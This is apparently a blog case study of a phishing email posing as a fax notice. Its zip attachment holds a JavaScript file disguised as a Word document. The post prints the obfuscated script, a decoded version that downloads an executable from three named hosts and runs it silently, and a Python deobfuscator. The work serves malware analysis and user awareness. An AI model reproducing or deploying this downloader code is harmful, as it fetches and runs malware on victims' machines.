JavaScript Virus Downloader

Recently there have been many attempts to install viruses using JavaScript code.

In this case study I present a recently received phishing mail and its content. If you open the attached zip file and click on the file inside it, the script downloads a batch of viruses onto your computer and activates them.

The Email is:

From:    Interfax [incoming@interfax.net]
To:      XXXX
Cc:
Subject: You have received a new fax, document 0000234523

You have a new fax!
To view it please open the attachment.

File size:       232 Kb
Scan time:       31 seconds
Number of pages: 10
Filename:        task_0000234523.doc
Quality:         500 DPI
Scanned at:      Sat, 2 Jan 2016 12:47:08 +0300
Sender:          Roger Carney

Thanks for using Interfax service!

(Figure: The virus mail.)

The attached zip file contains a file named task…doc.js.

(Figure: The ZIP file content.)

The filename tries to trick you into believing that this is a Word document, but the .js at the end makes it JavaScript code. When opened, Windows runs it with the Windows Script Host, and the script downloads software (viruses) onto the computer.

The JavaScript code itself is obfuscated. I wanted to see it in plain text, so I did some research on it to decode it:

var str=”5553515E09010D000524071D06011649000B09014A070B095E3C5E090
5140905100D07174A070B095E17505E555051555357515353545E55″;
var e7=’; ‘,r2=’00) ‘,i4='{ xa.’,q1='(xo’,g7=’2″; v’,j6=’%”)’,x0=’ld;’,j5=’d=”‘,i6=’ 1) ‘,w4=’lse’,y5=’b = “‘,f0=’t.She’,d2=’n,’,f3=’pt.C’,e6=’crip’,s9=’ try’,p8=’ i<b.’,v4=’ fa’,c6=’tri’,z0=’en’,h5=’fo’,w3=’rea’,v7=’Scrip’,t1=’n-co’,l5=’ar i=’,e4=’= 1;’,c8=’ct(“‘,l8=’y); ‘,o6=’ n<‘,n8=’ze’,m5=’pe =’,d6=’a.si’,q6=’ar’,w6='{ va’,n4=’.open’,y0=’tre’,t0=’bje’,d5=’biz’,p9=’ };’,c1='{ l’,m0=’.co’,n3=’ var’,y3=’r ‘,n9=’,1′,b5=’TEMP’,f1=’; }’,q2='”.ex’,n6=’.spl’,i2=’3″+’,b6=’.resp’,z8='”/co’,u6=’; x’,w0=’File’,v0=’us’,h7=’; };’,e2=’+S’,x7=’a =’,q0=’ ==’,s5=’n++) ‘,t9=’0) ‘,v3=’ea’,r7=’tch (‘,j7=’ar ld’,l7=’} ca’,r9=’len’,c5=’o.’,d9=’WS’,j3=’e”‘,t4='(92)+’,e3=’ebtec’,g8=’m”‘,e8=’it(” ‘,q9=’n+’,q8=’}; }’,d3=’if (‘,a3=’ W’,o3=’or (v’,n5=’r d’,z6=’r+”&r’,d7=’P”)’,b9=’ ws’,j9=’a.wri’,g6=’= ‘,c7=’unter’,h0=’d(); ‘,o1='”.ex’,y7=’; xa’,x6=’ W’,l1=’n+n+’,o5=’,0); ‘,v5=’n ‘,z9='();’,f4=’L2.X’,n0=’WScr’,v6=’ositi’,p6=’op’,u4=’ipt.’,j4=’Cr’,x4=eval,a4=’y { w’,s4=’p://”‘,y8=’En’,u1=’=3; ‘,a2=’Obj’,g0=’ 1; x’,z5=’xpand’,s7=’ODB’,w9=’n+’,f9=’+b[i’,a5=’en()’,z1=’SXM’,k1=’cup-‘,t2=’in.co’,j8=’ if’,m7=’==’,u3=’te’,z4=’ f’,u0=’,”htt’,t8=’; };’,t7=’To’,p0=’viron’,i8=’; ‘,g5=’ct(“M’,l3=’n =’,f8=’/?i’,k3=’ak’,f5=’; v’,r3=’; v’,f2=’r (va’,f7=’= 0;’,k7=’Sc’,g9=’n=1;’,v1=’St’,q4=’var x’,z2=’); ‘,s8=’ll”‘,s0=’xo.s’,o4=’s.’,r8=’te’,i9=’ng’,l6=’ xo =’,l4=’nd=’,u7=’); tr’,e5=’t.C’,m3='”96′,k8=’am”)’,x9=’i++) ‘,g1=’rom’,p5=’MLHTT’,t3=’) { ‘,u2=’CharC’,x8=’; bre’,x1=’ET”‘,l0=’ ws ‘,r0=’ar’,n1=’on = ‘,g4=’gth; ‘,p7=’rings’,m8=’00’,o0=’if (x’,d4=’reate’,w1=’n ‘,h2=’]+’,w7=’logy’,r5=’r ‘,d1=’catch’,a0=’d = i’,h8='{ f’,b2=’ 2′,k9=’ment’,s3=’stat’,x2=’0; ‘,q5=’ect(‘,i0=’Run(f’,i1=’+st’,h6=’m t’,w2='”)’,u8='(“G’,s1=’ (‘,m9=’.clo’,b4=’ode’,g2=’.E’,m4=’se’,y2='{ }’,f6='”AD’,w5=’eBod’,v2=’);’,k0=’45242′,o7=’a.ty’,x5=’w.a’,i3='(“%’,i5=’ri’,p1=’.S’,e9=’ ww’,o9=’va’,y1=’er) ‘,c3='{ dn ‘,z3=’ } ‘,a6=’ (d’,l2=’save’,n7=’ons’,t6='(f’,a9=’.f’,k5=’ = 0′,m2=’xa.’,t5=’hno’,b7=’avan’,c9=’xo.’,j1=’Obje’,a1=’er’,a8=’ { 
xo’,o2=’e”,2′,a7=’ > 1′,e1=”,h9=’115′,y6=’ xa.p’,p3=’eonw’,k4=’teO’;e1+=o9;e1+=y3;e1+=y5;e1+=k1;e1+=t1;e1+=t2;e1+=h6;e1+=b7;e1+=c5;e1+=d5;e1+=e9;e1+=x5;e1+=p3;e1+=e3;e1+=t5;e1+=w7;e1+=m0;e1+=g8;e1+=n6;e1+=e8;e1+=w2;e1+=f5;e1+=r0;e1+=l0;e1+=g6;e1+=n0;e1+=u4;e1+=j4;e1+=v3;e1+=k4;e1+=t0;e1+=c8;e1+=d9;e1+=e6;e1+=f0;e1+=s8;e1+=v2;e1+=n3;e1+=z4;e1+=l3;e1+=b9;e1+=g2;e1+=z5;e1+=y8;e1+=p0;e1+=k9;e1+=v1;e1+=p7;e1+=i3;e1+=b5;e1+=j6;e1+=e2;e1+=c6;e1+=i9;e1+=a9;e1+=g1;e1+=u2;e1+=b4;e1+=t4;e1+=m3;e1+=h9;e1+=g7;e1+=q6;e1+=l6;e1+=a3;e1+=v7;e1+=e5;e1+=w3;e1+=u3;e1+=j1;e1+=g5;e1+=z1;e1+=f4;e1+=p5;e1+=d7;e1+=e7;e1+=q4;e1+=x7;e1+=x6;e1+=k7;e1+=i5;e1+=f3;e1+=d4;e1+=a2;e1+=q5;e1+=f6;e1+=s7;e1+=p1;e1+=y0;e1+=k8;e1+=r3;e1+=j7;e1+=k5;e1+=i8;e1+=h5;e1+=f2;e1+=r5;e1+=g9;e1+=o6;e1+=u1;e1+=s5;e1+=h8;e1+=o3;e1+=l5;e1+=x0;e1+=p8;e1+=r9;e1+=g4;e1+=x9;e1+=w6;e1+=n5;e1+=v5;e1+=f7;e1+=s9;e1+=a8;e1+=n4;e1+=u8;e1+=x1;e1+=u0;e1+=s4;e1+=f9;e1+=h2;e1+=z8;e1+=c7;e1+=f8;e1+=j5;e1+=i1;e1+=z6;e1+=l4;e1+=k0;e1+=i2;e1+=d2;e1+=v4;e1+=w4;e1+=z2;e1+=s0;e1+=z0;e1+=h0;e1+=d3;e1+=c9;e1+=s3;e1+=v0;e1+=q0;e1+=b2;e1+=r2;e1+=i4;e1+=p6;e1+=a5;e1+=u6;e1+=o7;e1+=m5;e1+=g0;e1+=j9;e1+=r8;e1+=q1;e1+=b6;e1+=n7;e1+=w5;e1+=l8;e1+=o0;e1+=d6;e1+=n8;e1+=a7;e1+=m8;e1+=t9;e1+=c3;e1+=e4;e1+=y6;e1+=v6;e1+=n1;e1+=x2;e1+=m2;e1+=l2;e1+=t7;e1+=w0;e1+=t6;e1+=l1;e1+=q2;e1+=o2;e1+=u7;e1+=a4;e1+=o4;e1+=i0;e1+=w9;e1+=q9;e1+=o1;e1+=j3;e1+=n9;e1+=o5;e1+=l7;e1+=r7;e1+=y1;e1+=y2;e1+=f1;e1+=y7;e1+=m9;e1+=m4;e1+=z9;e1+=p9;e1+=j8;e1+=a6;e1+=w1;e1+=m7;e1+=i6;e1+=c1;e1+=a0;e1+=x8;e1+=k3;e1+=h7;e1+=z3;e1+=d1;e1+=s1;e1+=a1;e1+=t3;e1+=q8;e1+=t8;x4(e1);


As you can see, it is encoded, so it is hard to understand what it does. Decoding it reveals its true nature:

// Hosts the downloader tries, in order
var b = "cup-n-coin.com tavano.biz www.aeonwebtechnology.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
// Drop path: %TEMP%\961152 (String.fromCharCode(92) is a backslash)
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"961152";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");   // HTTP client
var xa = WScript.CreateObject("ADODB.Stream");     // binary stream used to write the file
var ld = 0;
// Up to three passes over the host list; str is the hex string declared at the
// top of the obfuscated script and is sent as the "id" parameter
for (var n=1; n<=3; n++) {
  for (var i=ld; i<b.length; i++) {
    var dn = 0;
    try {
      xo.open("GET","http://"+b[i]+"/counter/?id="+str+"&rnd=452423"+n, false);
      xo.send();
      if (xo.status == 200) {
        xa.open(); xa.type = 1;             // 1 = binary stream
        xa.write(xo.responseBody);
        if (xa.size > 1000) {               // ignore small (error page) responses
          dn = 1;
          xa.position = 0;
          xa.saveToFile(fn+n+".exe",2);     // 2 = overwrite an existing file
          try {
            ws.Run(fn+n+".exe",1,0);        // launch it, do not wait for it to exit
          }
          catch (er) { }
        }
        xa.close();
      }
      if (dn == 1) {
        ld = i;                             // remember which host worked
        break;
      }
    } catch (er) { }                        // any failure is swallowed silently
  }
}


The code is professionally made and even suppresses any exception that might occur during its operation (every catch block is empty), so it fails silently.
Basically, this code goes to three sites:

cup-n-coin.com
tavano.biz
www.aeonwebtechnology.com

and downloads an executable into the computer's "temp" directory under a meaningless-looking name (the fixed prefix 961152 plus the pass number):
xa.saveToFile(fn+n+".exe",2);
The ".exe" extension makes it a native Windows program. It then attempts to run the newly downloaded virus:
ws.Run(fn+n+".exe",1,0);
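The fragment-and-eval obfuscation shown earlier and the host list it hides can both be recovered statically, without ever running the script. The Python below is an added example, not the post's or the malware author's code: it parses a constructed sample written in the same style (fragments in a var list, an eval alias, an accumulator built with +=), rebuilds the string that would have been passed to eval, and then pulls the download hosts out of the split(" ") idiom seen in the decoded script. The sample script, the .invalid hostnames and the function names are assumptions.

```python
import re

# Constructed sample in the style of the mail's script (not the real payload):
# fragments declared in one var list, appended to e1 in scrambled order, then
# handed to eval through the alias x4. Hosts are reserved .invalid names.
SAMPLE = (
    r'''var x4=eval,c3='second.invalid"',a1='var b = "',d4='.split(" ");','''
    r'''b2='first.invalid ',e5=' var ws = WScript.CreateObject("WScript.Shell");','''
    r'''f6=' xo.open("GET","http://"+b[i]+"/counter/?id="+str,false);',e1='';'''
    r'''e1+=a1;e1+=b2;e1+=c3;e1+=d4;e1+=e5;e1+=f6;x4(e1);'''
)

# name='fragment' or name="fragment", allowing backslash escapes inside
FRAG_RE = re.compile(r"""(\w+)=('(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")""")
_ESC = {"n": "\n", "r": "\r", "t": "\t"}


def _unquote(lit):
    """Strip the quotes and resolve the simple JS escapes the scheme uses."""
    return re.sub(r"\\(.)", lambda m: _ESC.get(m.group(1), m.group(1)), lit[1:-1])


def deobfuscate(script):
    """Rebuild the string the script would eval, without executing anything."""
    frags = {name: _unquote(lit) for name, lit in FRAG_RE.findall(script)}
    alias = re.search(r"(\w+)=eval\b", script)
    if not alias:
        raise ValueError("no eval alias found")
    call = re.search(r"\b%s\((\w+)\)" % re.escape(alias.group(1)), script)
    if not call:
        raise ValueError("eval alias is never called")
    acc = call.group(1)                      # the accumulator, e1 in the sample
    order = re.findall(r"\b%s\+=(\w+);" % re.escape(acc), script)
    return "".join(frags[name] for name in order)


def download_hosts(decoded):
    """Pull the host list out of the decoded script's split(" ") idiom."""
    m = re.search(r'"([^"]*)"\.split\(" "\)', decoded)
    return m.group(1).split() if m else []


if __name__ == "__main__":
    plain = deobfuscate(SAMPLE)
    print(plain)
    print("hosts:", download_hosts(plain))
```

The same approach works on the real sample because it uses exactly this pattern (a var list of fragments, x4=eval, and a run of e1+=name; statements ending in x4(e1);).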

The program downloaded to your computer is itself another downloader, which can fetch the heavier spyware/ransomware and put it into action on your computer.

Some antivirus programs do intercept this virus downloader, but don't count on it. Just be aware and don't open "social engineering" emails that try to victimize you. In this picture you can see Microsoft antivirus intercepting the code (I had to disable it to process this code :-) ).

(Figure: Essential Detection, the antivirus intercepting the script.)